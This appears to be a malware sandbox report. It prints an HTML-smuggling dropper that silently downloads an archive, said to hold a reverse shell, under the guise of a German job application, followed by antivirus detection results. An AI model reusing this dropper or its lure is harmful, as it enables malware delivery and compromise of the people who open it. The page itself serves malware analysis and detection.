popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
<!-- code from https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ -->
<html>
<body>
<script>
function base64ToArrayBuffer(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
// 32bit simple reverse shell
var file = 'UmFyIRoHAQARnomCDAEFCAAHAQGqxbuAAC25JsktAgMLzgYE9AsgzEUivYAdABFCZXdlcmJ1bmcucGRmLmxuawoDAjJYwJA/ttsByNtKAziGRFMi9FBXygKg9J0qQCAgkAQggctpToqjDpgWiRthZGkrWQUoJVKFWiUIrI+CJBQ8mMViJBU6GMSKEgjBAh4MZHxJVkR6hjFZFgwQvgxWD43bw3OW3lCqw8X8M3ZvM5ub9n25n27zn5Bmc+5m/Z0bm/f/9mzmb474c/EKQABBsnoDrZAE5Q6APoRY+j/BfbGxbz2IE+b7vFue+Vp+cLh7CwHX1gPFkhSkIpT71DSLzEq+A7HpKUSRhnWhglZ9KtA3xvQQuG2iyTfoAFa+tXVzNkE4D8D4Gdj2ihmm6iyoxpQQ9zqjgUDzC2HIiSxALwrQXBXAzAsYW0ICx2cfJ9JKrJkrUK5eW0aedmfInJJccmeWDJ6w5L4lghZCSKeqBxLhLGoUZkiJDXfMWdvHiwqGC6UqbGpb9Oet7m+AmR86+E6+Oz81s0hYgGAzaUAsGxHB0yb1GREOgjmybf5O3QLZ7bNNxnmQBzwqluUqWn04tPksI0Tot1v9fOnSK3+aUteZahgjhFOYBfPGHKb+IIIwJUXcWVbNGZjgsHghxxIcIQGIiqoQ5tHOiqvNFhUoygt69xs7LSv0ZVtNl5HAGEcWGzISJSisG4oYXo/3UiLctymdcOfvIaXKa4KtNd5Pa+fjzOVtjtOncKC6pnKpXVLLiV9cxk6xGiYTCQsyS+3d52DMwk5aItDs76GxFz7DrKCRjM+B7v6q/xIXvP3+pa9+X49fhNWrZCqUqs0zG9c+FrRX35aQd2yqoxgduDt5inPL2wKODRJhUpkAKJS/64faVCXgOpcNFH8oqrNCj9In9xrd1JPw51NQ4tJMz/h/cH0I/psMnikPhNlSFQyeQjhI2ROPVvFbMtxhor2YG7nTSDnRtkJqaLz6jF7LD7mD
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'Meine Bewerbungsunterlagen Celina.7z';
if (window.navigator.msSaveOrOpenBlob) {
window.navigator.msSaveOrOpenBlob(blob,fileName);
} else {
var a = document.createElement('a');
console.log(a);
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
//window.location.href = "https://meine-bewerbungsvorlage.de/";
//window.location.replace("http://www.w3schools.com");
async function loaddata() {
await sleep(2);
window.location.href = "https://bewerbungsvorlagen.de/";
window.location.replace("https://bewerbungsvorlagen.de/");
async function sleep(seconds) {
return new Promise((resolve) => setTimeout(resolve, seconds *1100));
loaddata();
</script>
</body>
</html>
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX txt.trojan.cryxos
CAT-QuickHeal Clean
Skyhigh Clean
ALYac JS:Trojan.Cryxos.5130
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-HTML.Save.45cc6595
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 JS/TrojanDropper.Agent.PHD
TrendMicro-HouseCall Clean
Avast SVG:Smuggle-A [Drp]
Cynet Clean
Kaspersky Trojan-Downloader.Win32.Agent.xydfap
BitDefender JS:Trojan.Cryxos.5130
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan JS:Trojan.Cryxos.5130
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE JS:Trojan.Cryxos.5130
TrendMicro Clean
CMC Clean
Emsisoft JS:Trojan.Cryxos.5130 (B)
huorong HEUR:TrojanDropper/JS.Agent.bj
GData JS:Trojan.Cryxos.5130
Jiangmin Clean
Varist JS/Smuggling.A
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit JS:Trojan.Cryxos.D140A
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus VBS.PShell
MaxSecure Clean
Fortinet JS/Agent.PHD!tr
AVG SVG:Smuggle-A [Drp]
Panda Clean
alibabacloud Clean
No IRMA results available.